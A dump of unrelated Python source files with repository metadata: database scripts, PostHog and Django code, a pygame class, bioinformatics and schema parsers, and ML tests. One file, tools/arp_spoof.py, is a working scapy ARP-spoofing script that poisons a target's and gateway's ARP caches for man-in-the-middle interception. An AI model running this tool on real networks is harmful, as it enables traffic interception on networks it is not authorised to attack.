for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix):
__import__(modname)
# then, find all subclasses of WARSHIP_DB.Model
models = find_subclasses(ZKDASH_DB.Model)
for mod in models:
if mod.table_exists():
print "table exists: %s, continue!" % mod._meta.db_table
continue
mod.create_table()
print "created table: %s" % mod._meta.db_table
def reset_db():
"""reset db
"""
# firstly, import all modules of model.db package
prefix = model.db.__name__ + "."
for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix):
__import__(modname)
# then, find all subclasses of WARSHIP_DB.Model
models = find_subclasses(ZKDASH_DB.Model)
for mod in models:
if mod.table_exists():
print "table exists: %s, drop it!" % mod._meta.db_table
mod.drop_table()
mod.create_table()
print "created table: %s" % mod._meta.db_table
if __name__ == '__main__':
args = sys.argv
cmd = None
if len(args) > 1:
cmd = args[1]
if cmd == 'reset_db':
reset_db()
else:
sync_db()
| 26.223881 | 84 | 0.642573 |
a909c9d21100ad59c91ca572650b303e147a49c5 | 426 | py | Python | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import socket
import sys
import json
import json_over_tcp
from json_over_tcp import send_and_receive_msg
if __name__ == '__main__':
#test start stream:right input, case 0
cmd = {}
cmd["cmd-stop-stream"] = "NULL"
cmd_string = json.dumps(cmd)
result = send_and_receive_msg(cmd_string)
if result == False:
print "case 0 failed!"
exit()
print "case 0 succeed!"
| 22.421053 | 46 | 0.673709 |
637ad35cbb18e683a7236f25616659173215035b | 4,366 | py | Python | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 7,409 | 2020-02-09T23:18:10.000Z | 2022-03-31T22:36:25.000Z | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 5,709 | 2020-02-09T23:26:13.000Z | 2022-03-31T20:20:01.000Z | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 647 | 2020-02-13T17:50:55.000Z | 2022-03-31T11:24:19.000Z | from unittest.mock import ANY, patch
from uuid import uuid4
from freezegun import freeze_time
from ee.api.test.base import LicensedTestMixin
from ee.clickhouse.models.event import create_event
from ee.clickhouse.util import ClickhouseDestroyTablesMixin
from ee.models.license import License
from ee.tasks.send_license_usage import send_license_usage
from posthog.models import organization
from posthog.models.team import Team
from posthog.test.base import APIBaseTest
def _create_event(**kwargs):
kwargs.update({"event_uuid": uuid4()})
create_event(**kwargs)
class SendLicenseUsageTest(LicensedTestMixin, ClickhouseDestroyTablesMixin, APIBaseTest):
@freeze_time("2021-10-10T23:01:00Z")
@patch("posthoganalytics.capture")
@patch("requests.post")
def test_send_license_usage(self, mock_post, mock_capture):
team2 = Team.objects.create(organization=self.organization)
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(
event="$$internal_metrics_shouldnt_be_billed",
team=self.team,
distinct_id=1,
timestamp="2021-10-09T13:01:01Z",
)
_create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
mock_post.assert_called_once_with(
"https://license.posthog.com/licenses/usage",
data={"date": "2021-10-09", "key": self.license.key, "events_count": 3},
)
mock_capture.assert_called_once_with(
self.user.distinct_id,
"send license usage data",
{"date": "2021-10-09", "events_count": 3, "license_keys": ["enterprise"], "organization_name": "Test"},
groups={"instance": ANY, "organization": str(self.organization.id)},
)
@freeze_time("2021-10-10T23:01:00Z")
@patch("posthoganalytics.capture")
@patch("ee.tasks.send_license_usage.sync_execute", side_effect=Exception())
def test_send_license_error(self, mock_post, mock_capture):
team2 = Team.objects.create(organization=self.organization)
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(
event="$$internal_metrics_shouldnt_be_billed",
team=self.team,
distinct_id=1,
timestamp="2021-10-09T13:01:01Z",
)
_create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
mock_capture.assert_called_once_with(
self.user.distinct_id,
"send license usage data error",
{"error": "", "date": "2021-10-09", "organization_name": "Test"},
groups={"instance": ANY, "organization": str(self.organization.id)},
)
class SendLicenseUsageNoLicenseTest(APIBaseTest):
@freeze_time("2021-10-10T23:01:00Z")
@patch("requests.post")
def test_no_license(self, mock_post):
# Same test, we just don't include the LicensedTestMixin so no license
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
self.assertEqual(mock_post.call_count, 0)
| 47.978022 | 115 | 0.688044 |
1d83a31a5e2e08ae1de385158bc4b910ae01354b | 1,091 | py | Python | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | 1 | 2021-08-12T08:46:56.000Z | 2021-08-12T08:46:56.000Z | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | null | null | null | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-09-03 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BaseCustomUser',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True)),
('username', models.CharField(max_length=255)),
('cnp', models.CharField(max_length=15)),
('is_active', models.BooleanField(default=True)),
('staff', models.BooleanField(default=False)),
('admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
| 34.09375 | 117 | 0.567369 |
926ecc756213f4098aa8d295452f30fff7851a68 | 993 | py | Python | image.py | Jax-Carstensen/Battleship | aeee90ad0d27f8a4a19047716db35ca31a7dc4ab | [
"MIT"
] | null | null | null | image.py | Jax-Carstensen/Battleship | aeee90ad0d27f8a4a19047716db35ca31a7dc4ab | [
"MIT"
] | null | null | null | image.py | Jax-Carstensen/Battleship | aeee90ad0d27f8a4a19047716db35ca31a7dc4ab | [
"MIT"
] | null | null | null | from vector2 import *
import pygame
class Image:
def __init__(self, src, draw_width=64, draw_height=64):
self.src = src
self.image = pygame.image.load(self.src).convert_alpha()
self.rescale(Vector2(draw_width, draw_height))
self.image_rect = self.image.get_rect()
self.dimensions = Vector2(self.image.get_width(), self.image.get_height())
def rescale(self, new_dimensions):
if self.image.get_width() != self.image.get_height():
x = new_dimensions.x
y = x
new_dimensions = Vector2(int(new_dimensions.x), int(round(new_dimensions.x / self.image.get_width() * self.image.get_height())))
self.image = pygame.transform.scale(self.image, new_dimensions.tuple()).convert_alpha()
self.dimensions = Vector2(self.image.get_width(), self.image.get_height())
def draw(self, screen, position, flip=False):
if flip:
screen.blit(pygame.transform.flip(self.image, True, False), position.tuple())
else:
screen.blit(self.image, position.tuple()) | 39.72 | 132 | 0.717019 |
aa76e54299ab50a763c526250be7d0ebe60dd720 | 85 | py | Python | backend/blame/apps.py | StichtingIAPC/swipe | d1ea35a40813d2d5e9cf9edde33148c0a825efc4 | [
"BSD-3-Clause-Clear"
] | null | null | null | backend/blame/apps.py | StichtingIAPC/swipe | d1ea35a40813d2d5e9cf9edde33148c0a825efc4 | [
"BSD-3-Clause-Clear"
] | null | null | null | backend/blame/apps.py | StichtingIAPC/swipe | d1ea35a40813d2d5e9cf9edde33148c0a825efc4 | [
"BSD-3-Clause-Clear"
] | null | null | null | from django.apps import AppConfig
class BlameConfig(AppConfig):
name = 'blame'
| 14.166667 | 33 | 0.741176 |
45497b59322fb32318be73dd966a328124e1904b | 6,027 | py | Python | conflowgen/posthoc_analyses/yard_capacity_analysis.py | 1grasse/conflowgen | 142330ab6427254109af3b86102a30a13144ba0c | [
"MIT"
] | null | null | null | conflowgen/posthoc_analyses/yard_capacity_analysis.py | 1grasse/conflowgen | 142330ab6427254109af3b86102a30a13144ba0c | [
"MIT"
] | null | null | null | conflowgen/posthoc_analyses/yard_capacity_analysis.py | 1grasse/conflowgen | 142330ab6427254109af3b86102a30a13144ba0c | [
"MIT"
] | null | null | null | from __future__ import annotations
import datetime
from typing import Dict, Tuple, List, Collection, Union
from conflowgen.domain_models.data_types.storage_requirement import StorageRequirement
from conflowgen.domain_models.arrival_information import TruckArrivalInformationForDelivery, \
TruckArrivalInformationForPickup
from conflowgen.domain_models.container import Container
from conflowgen.domain_models.data_types.container_length import ContainerLength
from conflowgen.domain_models.vehicle import LargeScheduledVehicle, Truck
from conflowgen.posthoc_analyses.abstract_posthoc_analysis import AbstractPostHocAnalysis, get_hour_based_time_window, \
get_hour_based_range
class YardCapacityAnalysis(AbstractPostHocAnalysis):
"""
This analysis can be run after the synthetic data has been generated.
The analysis returns a data structure that can be used for generating reports (e.g., in text or as a figure)
as it is the case with :class:`.YardCapacityAnalysisReport`.
"""
@staticmethod
def get_used_yard_capacity_over_time(
storage_requirement: Union[str, Collection, StorageRequirement] = "all"
) -> Dict[datetime.datetime, float]:
"""
For each hour, the containers entering and leaving the yard are checked. Based on this, the required yard
capacity in TEU can be deduced - it is simply the maximum of these values. In addition, with the parameter
``storage_requirement`` the yard capacity can be filtered, e.g. to only include standard containers, empty
containers, or any other kind of subset.
Please be aware that this method slightly overestimates the required capacity. If one container leaves the yard
at the beginning of the respective time window and another container enters the yard at the end of the same time
window, still the TEU equivalence of both containers is recorded as the required yard capacity. Obviously the
entering container could use the same slot as the container which entered later. This minor inaccuracy might be
of little importance because no yard should be planned that tight. The benefit is that it further allows a
faster computation.
Args:
storage_requirement: One of
``"all"``,
a collection of :class:`StorageRequirement` enum values (as a list, set, or similar), or
a single :class:`StorageRequirement` enum value.
Returns:
A series of the used yard capacity in TEU over the time.
"""
container_stays: List[Tuple[datetime.datetime, datetime.datetime, float]] = []
container: Container
if storage_requirement == "all":
selected_containers = Container.select()
else:
if storage_requirement in set(StorageRequirement):
selected_containers = Container.select().where(
Container.storage_requirement == storage_requirement
)
else: # assume it is some kind of collection (list, set, ...)
selected_containers = Container.select().where(
Container.storage_requirement << storage_requirement
)
for container in selected_containers:
container_enters_yard: datetime.datetime
container_leaves_yard: datetime.datetime
if container.delivered_by_truck is not None:
truck: Truck = container.delivered_by_truck
arrival_time_information: TruckArrivalInformationForDelivery = \
truck.truck_arrival_information_for_delivery
container_enters_yard = arrival_time_information.realized_container_delivery_time
elif container.delivered_by_large_scheduled_vehicle is not None:
vehicle: LargeScheduledVehicle = container.delivered_by_large_scheduled_vehicle
container_enters_yard = vehicle.scheduled_arrival
else:
raise Exception(f"Faulty data: {container}")
if container.picked_up_by_truck is not None:
truck: Truck = container.picked_up_by_truck
arrival_time_information: TruckArrivalInformationForPickup = \
truck.truck_arrival_information_for_pickup
container_leaves_yard = arrival_time_information.realized_container_pickup_time
elif container.picked_up_by_large_scheduled_vehicle is not None:
vehicle: LargeScheduledVehicle = container.picked_up_by_large_scheduled_vehicle
container_leaves_yard = vehicle.scheduled_arrival
else:
raise Exception(f"Faulty data: {container}")
teu_factor_of_container = ContainerLength.get_factor(container.length)
container_stays.append((container_enters_yard, container_leaves_yard, teu_factor_of_container))
if len(container_stays) == 0:
return {}
first_arrival, _, _ = min(container_stays, key=lambda x: x[0])
_, last_pickup, _ = max(container_stays, key=lambda x: x[1])
first_time_window = get_hour_based_time_window(first_arrival) - datetime.timedelta(hours=1)
last_time_window = get_hour_based_time_window(last_pickup) + datetime.timedelta(hours=1)
used_yard_capacity: Dict[datetime.datetime, float] = {
time_window: 0
for time_window in get_hour_based_range(first_time_window, last_time_window)
}
for (container_enters_yard, container_leaves_yard, teu_factor_of_container) in container_stays:
time_window_at_entering = get_hour_based_time_window(container_enters_yard)
time_window_at_leaving = get_hour_based_time_window(container_leaves_yard)
for time_window in get_hour_based_range(time_window_at_entering, time_window_at_leaving):
used_yard_capacity[time_window] += teu_factor_of_container
return used_yard_capacity
| 53.336283 | 120 | 0.710138 |
d03d301c1394ac7fb12418590cb4281401350016 | 3,280 | py | Python | short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py | lynnlangit/idseq-workflows | 2423bcb88e3e084b0d709c9936aecd476364a31e | [
"MIT"
] | null | null | null | short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py | lynnlangit/idseq-workflows | 2423bcb88e3e084b0d709c9936aecd476364a31e | [
"MIT"
] | null | null | null | short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py | lynnlangit/idseq-workflows | 2423bcb88e3e084b0d709c9936aecd476364a31e | [
"MIT"
] | null | null | null | import os
import subprocess
from idseq_dag.engine.pipeline_step import PipelineCountingStep
from idseq_dag.exceptions import InsufficientReadsError
import idseq_dag.util.command as command
import idseq_dag.util.command_patterns as command_patterns
import idseq_dag.util.convert as convert
import idseq_dag.util.log as log
import idseq_dag.util.count as count
from idseq_dag.util.s3 import fetch_reference
class PipelineStepRunGsnapFilter(PipelineCountingStep):
""" Regardless of specified “host” organism, it is essential to remove all potentially-human
sequences for privacy reasons. Thus, a final GSNAP alignment is performed against the human
genome for samples from all host types.
```
gsnapl
-A sam
--batch=0
--use-shared-memory=0
--gmap-mode=all
--npaths=1
--ordered
-t 32
--max-mismatches=40
-D {gsnap_base_dir}
-d {gsnap_index_name}
-o {output_sam_file}
{input_fas}
```
Two input FASTAs means paired reads.
The GSNAP documentation can be found [here](http://research-pub.gene.com/gmap/src/README).
"""
# Two input FASTAs means paired reads.
def input_fas(self):
return self.input_files_local[0][0:2]
def validate_input_files(self):
if not count.files_have_min_reads(self.input_fas(), 1):
raise InsufficientReadsError("Insufficient reads")
def run(self):
input_fas = self.input_fas()
output_fas = self.output_files_local()
output_sam_file = os.path.join(self.output_dir_local,
self.additional_attributes["output_sam_file"])
self.additional_output_files_hidden.append(output_sam_file)
genome_dir = fetch_reference(self.additional_files["gsnap_genome"],
self.ref_dir_local,
allow_s3mi=True,
auto_untar=True)
gsnap_base_dir = os.path.dirname(genome_dir)
gsnap_index_name = os.path.basename(genome_dir)
# Hack to determine gsnap vs gsnapl
error_message = subprocess.run(
['gsnapl', '-D', gsnap_base_dir, '-d', gsnap_index_name],
input='>'.encode('utf-8'),
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
).stderr
gsnap_exe = "gsnap" if 'please run gsnap instead' in error_message.decode('utf-8') else "gsnapl"
# Run Gsnap
gsnap_params = [
'-A', 'sam', '--batch=0', '--use-shared-memory=0',
'--gmap-mode=all', '--npaths=1', '--ordered', '-t', 32,
'--max-mismatches=40', '-D', gsnap_base_dir, '-d', gsnap_index_name,
'-o',
output_sam_file
] + input_fas
command.execute(
command_patterns.SingleCommand(
cmd=gsnap_exe,
args=gsnap_params
)
)
log.write("Finished GSNAP alignment.")
# Extract out unmapped files from sam
if len(input_fas) == 2:
convert.generate_unmapped_pairs_from_sam(
output_sam_file, output_fas)
else:
convert.generate_unmapped_singles_from_sam(
output_sam_file, output_fas[0])
| 36.444444 | 104 | 0.623171 |
9d6871caad73ee47db1d0a583622ba4a1ee5a9de | 2,632 | py | Python | lingofunk_regenerate/tests.py | lingofunk/lingofunk-regenerate | aa38044594990c895e0f370734447dcc388c0b2f | [
"MIT"
] | null | null | null | lingofunk_regenerate/tests.py | lingofunk/lingofunk-regenerate | aa38044594990c895e0f370734447dcc388c0b2f | [
"MIT"
] | null | null | null | lingofunk_regenerate/tests.py | lingofunk/lingofunk-regenerate | aa38044594990c895e0f370734447dcc388c0b2f | [
"MIT"
] | null | null | null | import torch
import numpy as np
from lingofunk_regenerate.utils import log as _log
def log(text):
_log(text, prefix="tests: ")
def test_generate_text_of_sentiment(model, dataset):
log("Text generation of given sentiment\n")
# Samples latent and conditional codes randomly from prior
z = model.sample_z_prior(1)
c = model.sample_c_prior(1)
# Generate positive sample given z
c[0, 0], c[0, 1] = 1, 0
_, c_idx = torch.max(c, dim=1)
sample_idxs = model.sample_sentence(z, c, temp=0.1)
log("Sentiment: {}".format(dataset.idx2label(int(c_idx))))
log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs)))
# Generate negative sample from the same z
c[0, 0], c[0, 1] = 0, 1
_, c_idx = torch.max(c, dim=1)
sample_idxs = model.sample_sentence(z, c, temp=0.8)
log("Sentiment: {}".format(dataset.idx2label(int(c_idx))))
log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs)))
def test_interpolate(model, dataset, gpu=False):
log("Interpolation of z\n")
c = model.sample_c_prior(1)
z1 = model.sample_z_prior(1).view(1, 1, model.z_dim)
z1 = z1.cuda() if gpu else z1
z2 = model.sample_z_prior(1).view(1, 1, model.z_dim)
z2 = z2.cuda() if gpu else z2
# Interpolation coefficients
alphas = np.linspace(0, 1, 10)
for alpha in alphas:
z = float(1 - alpha) * z1 + float(alpha) * z2
sample_idxs = model.sample_sentence(z, c, temp=0.1)
sample_sent = dataset.idxs2sentence(sample_idxs)
log("{}".format(sample_sent))
def test_encode_text_add_noize_and_decode(
model, dataset, sentence="I love to eat in Las Vegas", use_c_prior=True
):
log("Encode, add noize & decode\n")
log("Sentence: " + sentence)
mbsize = 1
sentence = dataset.sentence2idxs(sentence)
sentence = np.array(sentence).reshape(-1, mbsize)
sentence = torch.from_numpy(sentence)
# Encoder: sentence -> z
mu, logvar = model.forward_encoder(sentence)
if use_c_prior:
c = model.sample_c_prior(mbsize)
else:
c = model.forward_discriminator(sentence.transpose(0, 1))
# c[0, 0], c[0, 1] = 1, 0
sigma = 0.001
temp = 0.001
for i in range(10):
z = model.sample_z(mu, logvar)
z_noized = z.type(torch.FloatTensor) + torch.from_numpy(
np.random.randn(z.size(0), z.size(1))
).type(torch.FloatTensor) * (0 if i == 0 else sigma)
sampled = model.sample_sentence(z_noized, c, temp=temp)
sampled_sentence = dataset.idxs2sentence(sampled)
print("Sampled sentence: " + sampled_sentence + "\n")
| 28.301075 | 75 | 0.648556 |
2156100a4127a2f54f129e082dfcea6c3ca17ef5 | 1,102 | py | Python | tools/arp_spoof.py | s3q/backdoor_c | 5c5f67bcc37fea34d84e2ed0805df52ceb060c7a | [
"Apache-2.0"
] | 5 | 2021-08-05T05:22:45.000Z | 2022-02-23T00:11:53.000Z | tools/arp_spoof.py | s3q/blackdoor | 5c5f67bcc37fea34d84e2ed0805df52ceb060c7a | [
"Apache-2.0"
] | null | null | null | tools/arp_spoof.py | s3q/blackdoor | 5c5f67bcc37fea34d84e2ed0805df52ceb060c7a | [
"Apache-2.0"
] | null | null | null | import sys
import scapy.all as scapy
import argparse
from time import sleep
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', dest='target', help='Specify target ip')
parser.add_argument('-g', '--gateway', dest='gateway', help='Specify spoof ip')
return parser.parse_args()
def get_mac(ip):
responses, unanswered = scapy.srp(scapy.Ether(dst="FF:FF:FF:FF:FF:FF")/scapy.ARP(pdst=ip), timeout=1, retry=2, verbose=False)
for s,r in responses:
return r[scapy.Ether].src
return None
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
arguments = get_arguments()
sent_packet=0
try:
while True:
spoof(arguments.target, arguments.gateway)
spoof(arguments.gateway, arguments.target)
sent_packet+=2
print('\r[+] - Sent packet : '+str(sent_packet))
sys.stdout.flush()
sleep(1)
except KeyboardInterrupt:
print('[-] - Ctrl + C detected ...') | 30.611111 | 129 | 0.675136 |
19e69e622c4cbcfb2e1c43de650593873b3e849b | 1,592 | py | Python | recipes/engine_tests/multiple_placeholders.py | engeg/recipes-py | 9dac536b55887262b4ce846f3db7a7f596542e5e | [
"Apache-2.0"
] | 1 | 2021-04-24T04:03:01.000Z | 2021-04-24T04:03:01.000Z | recipes/engine_tests/multiple_placeholders.py | engeg/recipes-py | 9dac536b55887262b4ce846f3db7a7f596542e5e | [
"Apache-2.0"
] | null | null | null | recipes/engine_tests/multiple_placeholders.py | engeg/recipes-py | 9dac536b55887262b4ce846f3db7a7f596542e5e | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests error checking around multiple placeholders in a single step."""
from recipe_engine.post_process import DropExpectation
DEPS = [
'assertions',
'json',
'step',
]
def RunSteps(api):
# illegal; multiple unnamed placeholders of the same kind "json.output".
with api.assertions.assertRaisesRegexp(
ValueError, r'conflicting .*: \[\'json\.output unnamed\'\]'):
api.step('step 1', ['cmd', api.json.output(), api.json.output()])
# illegal; multiple named placeholders with the same name
with api.assertions.assertRaisesRegexp(
ValueError, r'conflicting .*: \["json\.output named \'bob\'"\]'):
api.step('step 2', [
'cmd',
api.json.output(name='bob'),
api.json.output(name='bob'),
])
# legal; multiple named placeholders with unique names
result = api.step('step 3', [
'cmd',
api.json.output(name='bob'),
api.json.output(name='charlie'),
])
api.assertions.assertEqual(result.json.outputs['bob'], 1)
api.assertions.assertEqual(result.json.outputs['charlie'], 2)
# legal; multiple of the same input placeholders
result = api.step('step 4', [
'cmd',
api.json.input('bob'),
api.json.input('charlie'),
])
def GenTests(api):
yield (
api.test('basic')
+ api.step_data(
'step 3',
api.json.output(1, name='bob'),
api.json.output(2, name='charlie'),
)
+ api.post_process(DropExpectation)
)
| 26.983051 | 74 | 0.652638 |
2b6de2fc2ecb27febe44479b8954066a0ab7f415 | 6,973 | py | Python | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | 2 | 2015-11-19T03:53:09.000Z | 2016-11-23T10:45:33.000Z | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | 1 | 2015-04-28T15:54:20.000Z | 2015-04-29T23:13:13.000Z | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
import webapp2
import re
from google.appengine.ext import db
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
import xml.etree.ElementTree as ET
import logging
import api
def MakeParserOfType (format, webapp):
if (format == 'mcf') :
return MCFParser(webapp)
elif (format == 'rdfa') :
return RDFAParser(webapp)
else :
return 0
class ParseExampleFile :
def __init__ (self, webapp):
self.webapp = webapp
self.initFields()
def initFields(self):
self.currentStr = []
self.terms = []
self.egmeta = {}
self.preMarkupStr = ""
self.microdataStr = ""
self.rdfaStr = ""
self.jsonStr = ""
self.state= ""
def nextPart(self, next):
if (self.state == 'PRE-MARKUP:'):
self.preMarkupStr = "".join(self.currentStr)
elif (self.state == 'MICRODATA:'):
self.microdataStr = "".join(self.currentStr)
elif (self.state == 'RDFA:'):
self.rdfaStr = "".join(self.currentStr)
elif (self.state == 'JSON:'):
self.jsonStr = "".join(self.currentStr)
self.state = next
self.currentStr = []
def process_example_id(self, m):
self.egmeta["id"] = m.group(1)
logging.debug("Storing ID: %s" % self.egmeta["id"] )
return ''
def parse (self, contents):
content = ""
egid = re.compile("""#(\S+)\s+""")
for i in range(len(contents)):
content += contents[i]
lines = re.split('\n|\r', content)
for line in lines:
# Per-example sections begin with e.g.: 'TYPES: #music-2 Person, MusicComposition, Organization'
if ((len(line) > 6) and line[:6] == "TYPES:"):
self.nextPart('TYPES:')
api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta)
# logging.info("AddExample called with terms %s " % self.terms)
self.initFields()
typelist = re.split(':', line)
self.terms = []
self.egmeta = {}
# logging.info("TYPE INFO: '%s' " % line );
tdata = egid.sub(self.process_example_id, typelist[1]) # strips IDs, records them in egmeta["id"]
ttl = tdata.split(',')
for ttli in ttl:
ttli = re.sub(' ', '', ttli)
# logging.info("TTLI: %s " % ttli); # danbri tmp
self.terms.append(api.Unit.GetUnit(ttli, True))
else:
tokens = ["PRE-MARKUP:", "MICRODATA:", "RDFA:", "JSON:"]
for tk in tokens:
ltk = len(tk)
if (len(line) > ltk-1 and line[:ltk] == tk):
self.nextPart(tk)
line = line[ltk:]
if (len(line) > 0):
self.currentStr.append(line + "\n")
api.Example.AddExample(self.terms, self.preMarkupStr, self.microdataStr, self.rdfaStr, self.jsonStr, self.egmeta) # should flush on each block of examples
# logging.info("Final AddExample called with terms %s " % self.terms)
class RDFAParser :
def __init__ (self, webapp):
self.webapp = webapp
def parse (self, files, layer="core"):
self.items = {}
root = []
for i in range(len(files)):
logging.info("RDFa parse schemas in %s " % files[i])
parser = ET.XMLParser(encoding="utf-8")
tree = ET.parse(files[i], parser=parser)
root.append(tree.getroot())
pre = root[i].findall(".//*[@prefix]")
for e in range(len(pre)):
api.Unit.storePrefix(pre[e].get('prefix'))
for i in range(len(root)):
self.extractTriples(root[i], None, layer)
return self.items.keys()
def stripID (self, str) :
if (len(str) > 16 and (str[:17] == 'http://schema.org')) :
return str[18:]
else:
return str
def extractTriples(self, elem, currentNode, layer="core"):
typeof = elem.get('typeof')
resource = elem.get('resource')
href = elem.get('href')
property = elem.get('property')
text = elem.text
if (property != None):
property = api.Unit.GetUnit(self.stripID(property), True)
if (href != None) :
href = api.Unit.GetUnit(self.stripID(href), True)
# self.webapp.write("<br>%s %s %s" % (currentNode, property, href))
api.Triple.AddTriple(currentNode, property, href, layer)
self.items[currentNode] = 1
elif (text != None):
# logging.info("<br>%s %s '%s'" % (currentNode, property, text))
api.Triple.AddTripleText(currentNode, property, text, layer)
self.items[currentNode] = 1
if (resource != None):
currentNode = api.Unit.GetUnit(self.stripID(resource), True)
if (typeof != None):
api.Triple.AddTriple(currentNode, api.Unit.GetUnit("typeOf", True), api.Unit.GetUnit(self.stripID(typeof), True), layer)
for child in elem.findall('*'):
self.extractTriples(child, currentNode, layer)
class MCFParser:
def __init__ (self, webapp):
self.webapp = webapp
def extractUnitName (self, line):
parts = re.split(':', line)
name = parts[1]
return re.sub(' ', '', name)
def extractPredicateName (self, line):
parts = re.split(':', line)
return parts[0]
def cleanValue (self, value) :
if (value.find('"') > -1):
parts = re.split('"', value)
return parts[1]
else:
return re.sub(' ', '', value)
def extractValues (self, line):
parts = re.split(':', line)
raw_values = re.split(',', parts[1])
values = []
for rv in raw_values:
values.append(self.cleanValue(rv))
return values
def parse (self, content):
self.items = {}
lines = re.split('\n|\r', content)
unit = None
for l in lines:
# self.webapp.write("Got line" + l)
if (len(l) > 5 and (l[:5] == "Unit:")) :
unit = api.Unit.GetUnit(self.extractUnitName(l), True)
self.items[unit] = 1
# self.webapp.write("Got unit:" + unit)
elif (len(l) > 1 and (l.find(':') > 1)) :
predicate = apiUnit.GetUnit(self.extractPredicateName(l), True)
values = self.extractValues(l)
# self.webapp.write("<br>Got predicate " + predicate)
for v in values:
api.Triple.AddTriple(unit, predicate, api.Unit.GetUnit(v, True))
return self.items.keys()
| 35.395939 | 162 | 0.530331 |
bc636021ea1da44862595c57e3c1d2942b4b0f54 | 816 | py | Python | scrapyproject/cinemaspiders/yahoo_cinema.py | gas1121/JapanCinemaStatusSpider | 67c7b963914565589f64dd1bcf18839a4160ea34 | [
"MIT"
] | 2 | 2018-06-07T13:28:03.000Z | 2018-12-10T14:04:53.000Z | scrapyproject/cinemaspiders/yahoo_cinema.py | gas1121/JapanCinemaStatusSpider | 67c7b963914565589f64dd1bcf18839a4160ea34 | [
"MIT"
] | null | null | null | scrapyproject/cinemaspiders/yahoo_cinema.py | gas1121/JapanCinemaStatusSpider | 67c7b963914565589f64dd1bcf18839a4160ea34 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from scrapyproject.cinemaspiders.cinema_spider import CinemaSpider
class YahooCinemaSpider(CinemaSpider):
"""
cinema info spider for http://movies.yahoo.co.jp
"""
name = "yahoo_cinema"
allowed_domains = ["movies.yahoo.co.jp"]
start_urls = ['http://movies.yahoo.co.jp/area/']
# settings for cinema_spider
county_xpath = '//div[@id="allarea"]//a'
